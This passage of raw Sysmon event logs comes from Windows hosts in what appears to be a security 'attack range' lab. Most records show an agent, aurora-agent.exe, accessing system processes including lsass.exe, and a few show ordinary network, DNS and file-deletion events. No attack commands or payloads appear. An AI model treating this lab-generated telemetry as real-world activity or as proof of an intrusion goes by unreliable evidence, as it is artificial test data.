Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016778Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.764{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016777Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.763{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016776Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.760{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016775Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.755{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016774Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.754{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016773Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.750{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016772Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.748{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016771Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.740{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016770Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.734{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016769Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.730{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016768Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.721{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016767Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.718{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016766Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.706{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016765Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.701{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016764Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.677{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016763Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.661{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016762Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.653{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016761Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.645{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016760Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.635{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016759Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.600{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016758Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.592{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016757Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.585{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016756Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.575{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016755Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.564{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016754Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.553{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 354300x800000000000000016753Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:01.119{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50108-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000016752Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.544{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016751Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.538{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 23542300x800000000000000016750Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.342{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=051CB981F01D2423CA45F232C3E33E29,SHA256=BB1D4A7AFBD4197433662F8ACB0ACA506D76940B1C18A6C4F3854E57766C5E06,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000043915Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.476{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56362-false23.33.22.142a23-33-22-142.deploy.static.akamaitechnologies.com80http 354300x800000000000000043914Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.441{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56360-false34.120.115.102102.115.120.34.bc.googleusercontent.com443https 354300x800000000000000043913Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.439{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56361-false34.120.115.102102.115.120.34.bc.googleusercontent.com443https 354300x800000000000000043912Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.638{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60595- 22542200x800000000000000043911Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.477{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240r3.o.lencr.org0type: 5 o.lencr.edgesuite.net;type: 5 a1887.dscq.akamai.net;23.33.22.142;23.33.22.139;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000043920Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:03.981{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\2752s6y5.default-release\cache2\doomed\1244MD5=414557819CC71EA71F7A30BF4D0693B5,SHA256=1040EC50D74D97E653B777089D439F31FF2CC34C86893C3C0E327933C195A4E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043919Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:03.981{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla 